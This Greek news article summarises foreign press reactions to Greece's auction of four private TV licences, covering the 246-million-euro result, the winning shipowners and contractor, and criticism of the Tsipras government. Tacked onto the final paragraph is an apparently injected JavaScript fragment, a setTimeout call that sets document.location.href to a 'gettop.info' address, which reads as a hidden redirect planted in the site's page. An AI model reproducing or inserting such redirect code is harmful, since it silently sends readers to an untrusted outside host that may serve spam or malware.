Ο ξένος Τύπος για τη δημοπρασία των τηλεοπτικών αδειών

0
2

 

Στο επίκεντρο και του διεθνούς Τύπου ήταν η δημοπρασία των τεσσάρων τηλεοπτικών αδειών που αφιέρωσε εκτενή δημοσιεύματα στην πρωόγνωρη για τα ελληνικά δεδομένα διαδικασία.

«Η Ελλάδα κέρδισε 246 εκατομμύρια ευρώ σε δημοπρασία για την κατανομή των τεσσάρων ιδιωτικών τηλεοπτικών καναλιών, ως μέρος μιας μεγάλης μεταρρύθμισης του οπτικοακουστικού τομέα με στόχο την κάθαρση. Η διαδικασία ήταν εξαιρετικά αμφιλεγόμενη…», σχολιάζει η γαλλική εφημερίδα «L’ Express» που προσθέτει:

«Οι τέσσερις άδειες ισχύουν για μία δεκαετία και λήφθηκαν από τρεις ιδιοκτήτες κι έναν εργολάβο που θεωρείται ότι έχει στενή σχέση με την κυβέρνηση του πρωθυπουργού Αλέξη Τσίπρα».

Και συμπληρώνει: «Τα αποτελέσματα αυτά είναι το αποκορύφωμα μιας μεταρρύθμισης που στόχο έχει, σύμφωνα με την αριστερή κυβέρνηση του Αλέξη Τσίπρα, τον εξορθολογισμό του οπτικοακουστικού τομέα τον οποίο μέχρι τώρα ελέγχουν μία χούφτα ολιγάρχες βυθίζοντας τα ΜΜΕ σε οικονομική αδιαφάνεια».

Από την πλευρά της η αμερικανική Wall Street Journal υπό τον τίτλο «Τηλεοπτικές μάχες εκατομμυρίων στην Ελλάδα των Μνημονίων» γράφει στο δημοσίευμά της: «H Ελλάδα συγκέντρωσε το ποσό των 246 εκατομμυρίων ευρώ από την δημοπρασία των ιδιωτικών τηλεοπτικών αδειών μετά από μία μαραθώνια διαδικασία που διήρκεσε περίπου τρεις ημέρες».

«Δόθηκαν τέσσερις άδειες. Μόνο δύο από τα υφιστάμενα κανάλια, ο SΚΑΙ και ο ANT1 , εξασφάλισαν άδεια εκπομπής που τους επιτρέπει να συνεχίζουν να αναμεταδίδουν. Όσα κανάλια δεν έλαβαν άδεια θα πρέπει να σταματήσουν να εκπέμπουν μέσα σε διάστημα τριών μηνών, όπως δήλωσε η ελληνική κυβέρνηση».

Στο δημοσίευμα αναφέρεται χαρακτηριστικά πως «με τη χώρα να είναι σε μνημόνιο, η ελληνική κυβέρνηση υποσχέθηκε να δημοπρατήσει τις τηλεοπτικές άδειες για πρώτη φορά…«.

Επίσης, το Reuters, χαρακτήρισε «πολιτικά αμφιλεγόμενο βήμα» τον διαγωνισμό. «Η Ελλάδα παραχωρεί νέες ραδιοτηλεοπτικές άδειες μ΄ένα πολιτικά αμφιλεγόμενο βήμα και την ελληνική κυβέρνηση να ισχυρίζεται ότι θέλει να βάλει τάξη στον ραδιοτηλεοπτικό τομέα που λειτουργεί μέχρι τώρα βυθισμένος στην κακοδιαχείριση και τη διαφθορά», σχολιάζει το Reuters.

«Η αριστερή κυβέρνηση υπό την ηγεσία του πρωθυπουργού, Αλέξη Τσίπρα, είχε δηλώσει ότι η κίνηση αυτή θα βοηθήσει στη μεταρρύθμιση του οπτικοακουστικού τομέα την ώρα που τα ελληνικά ΜΜΕ υποστηρίζουν ότι, με την κίνηση αυτή περιορίζει την ελευθερία του λόγου, βάζει «λουκέτο» στους τηλεοπτικούς σταθμούς και «αφήνει άνεργους χιλιάδες ανθρώπους», επισημαίνει το πρακτορείο.

«Μετά από μια μαραθώνια δημοπρασία που διήρκεσε σχεδόν 66 ώρες, η ελληνική κυβέρνηση διέθεσε για τα επόμενα 10 χρόνια τέσσερις τηλεοπτικές άδειες σε ιδιωτικές επιχειρήσεις«, αναφέρει τηλεγράφημα του γερμανικού πρακτορείου ειδήσεων dpa. «Το ελληνικό κράτος φέρεται να άντλησε για τις νέες άδειες συνολικά 246 εκατομμύρια ευρώ».

Όπως επισημαίνει το dpa, τις νέες άδειες κέρδισαν τρεις εφοπλιστές και ένας εργολάβος. «Δύο από τους μεγαλύτερους ιδιωτικούς τηλεοπτικούς σταθμούς (Alpha και Star) χάνουν τις άδειές τους. Θα πρέπει να κλείσουν εντός 90 ημερών».

«Τις νέες άδειες κέρδισαν οι τηλεοπτικοί σταθμοί ΣΚΑΪ και ΑΝΤ1 που υπήρχαν ήδη και οι οποίοι ανήκουν σε δύο οικογένειες εφοπλιστών. Σε αυτούς προστίθενται δυο νέοι σταθμοί: Alter Ego (ο ιδιοκτήτης είναι επίσης εφοπλιστής) και Καλογρίτσας (εργολάβος). Είναι γνωστό ότι ο ιδιοκτήτης του τελευταίου σταθμού διατηρεί φιλίες με μέλη του νυν κυβερνητικού συνασπισμού».

Το γερμανικό πρακτορείο ειδήσεων επισημαίνει ότι το σύνολο της αντιπολίτευσης όπως και η Ένωση Δημοσιογράφων επικρίνουν τη μείωση των αδειών από τις επτά στις τέσσερις. Όπως εκτιμούν, «το κλείσιμο ορισμένων σταθμών θα οδηγήσει εκατοντάδες στην ανεργία. Για τη συνταγματικότητα της διαδικασίας αναμένεται να αποφανθεί το Συμβούλιο της Επικρατείας. Στον αντίποδα, η κυβέρνηση εκτιμά ότι λόγω της μείωσης των διαφημίσεων κατά τη διάρκεια της κρίσης, η ελληνική τηλεοπτική αγορά δεν είναι σε θέση να συντηρήσει όλους τους υφιστάμενους σταθμούς. Ο πρωθυπουργός Αλέξης Τσίπρας έχει επιρρίψει επανειλημμένως στους ιδιοκτήτες των ιδιωτικών σταθμών την κατηγορία ότι αποτελούν μέρος ενός διαχρονικού συστήματος νεποτισμού. Αντιθέτως η αντιπολίτευση ισχυρίζεται ότι ο Τσίπρας επιχειρεί να διαμορφώσει ένα νέο μιντιακό κατεστημένο, φίλα διακείμενο στον ίδιο».

Η Der Standard τιτλοφορείται «Πρωτοφανής μαραθώνιος η διαδικασία των 66 ωρών».

Τρεις ιδιοκτήτες κι ένας εργολάβος είναι οι νικητές, γράφει η εφημερίδα. Ύστερα από σχεδόν 66 ώρες μαραθώνιας δημοπρασίας, η κυβέρνηση των Αθηνών χορηγεί τέσσερις τηλεοπτικές άδειες με διάρκεια δέκα ετών. Αυτό ανακοινώθηκε από τον εκπρόσωπο της ελληνικής κυβέρνησης την Παρασκευή το πρωί.

«Η ελληνική κυβέρνηση θα λάβει συνολικά το ποσό των 246 εκατομμυρίων ευρώ για τις νέες άδειες. Νικητές των νέων αδειών είναι τρεις ιδιοκτήτες κι ένας εργολάβος», γράφει μεταξύ άλλων το επίμαχο δημοσίευμα.

Οι προϋπάρχοντες τηλεοπτικοί σταθμοί ανήκαν κυρίως σε εφοπλιστές και εργολάβους. Στην διαδικασία ηττημένοι είναι δύο από τους μεγαλύτερους ιδιωτικούς ραδιοτηλεοπτικούς σταθμούς: ο Alpha και το Star θα πρέπει να κλείσουν εντός 90 ημερών.

Τις νέες άδειες κέρδισαν οι σταθμοί ΣΚΑΙ και ΑΝΤ1 που υπήρχαν και στο παρελθόν. Υπάρχουν και οι δύο νέοι τηλεοπτικοί σταθμοί: το Alter Ego (o ιδιοκτήτης του είναι πλοιοκτήτης ) και αυτό του Καλογρίτσα (εργολάβος). Για τον Καλογρίτσα , η αυστριακή εφημερίδα σχολιάζει : «Ο ιδιοκτήτης αυτού του σταθμού είναι γνωστός για την φιλία του με στελέχη της κυβέρνησης συνασπισμού του Αλέξη Τσίπρα».

Η κυβέρνηση εκτιμά ότι η ελληνική τηλεοπτική αγορά δεν είναι σε θέση να χρηματοδοτήσει όλους τους υφιστάμενους σταθμούς εξαιτίας της μείωσης της διαφήμισης στον απόηχο της χρηματοπιστωτικής κρίσης.

Για την αντιπολίτευση, ο Έλληνας πρωθυπουργός προσπαθεί να δημιουργήσει ένα νέο σύστημα πολυμέσων που να είναι πιο φιλικά προς αυτόν».

Τέλος το Γαλλικό Πρακτορείο γράφει: «Μαραθώνιος» με έπαθλο 246 εκατομμύρια ευρώ η δημοπρασία για τις άδειες

Αναλυτικά στο δημοσίευμα αναφέρεται: «Η Ελλάδα συγκέντρωσε το ποσό των 246 εκατομμυρίων ευρώ από την δημοπράτηση τεσσάρων ιδιωτικών αδειών σε μία μαραθώνια προσπάθεια κατά την οποία επικράτησαν οι πλοιοκτήτες, συμπεριλαμβανομένου του αφεντικού κορυφαίας ποδοσφαιρικής ομάδα της χώρας».

Σε άλλο σημείο του δημοσιεύματος επισημαίνεται: Οι επικριτές αυτής της διαδικασίας υποστηρίζουν ότι απλώς ήταν ένα τέχνασμα από τον πρωθυπουργό Αλέξη Τσίπρα για να αντικαταστήσει τους βαρόνους της τηλεόρασης που αντιτάχθηκαν στο αριστερό κόμμα του ΣΥΡΙΖΑ με άλλους που το προτιμούν περισσότερο.

Η πρωτοφανής δημοπρασία είδε τους ιδιοκτήτες καναλιών αλλά και τους υποψήφιους ιδιοκτήτες να παραμένουν κλειδωμένοι σε ένα κτίριο του υπουργείου Γενικού Γραμματείας Ενημέρωσης επί τρεις νύχτες, μία διαδικασία που ορισμένες φορές περιγράφεται ως ταπεινωτική«. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ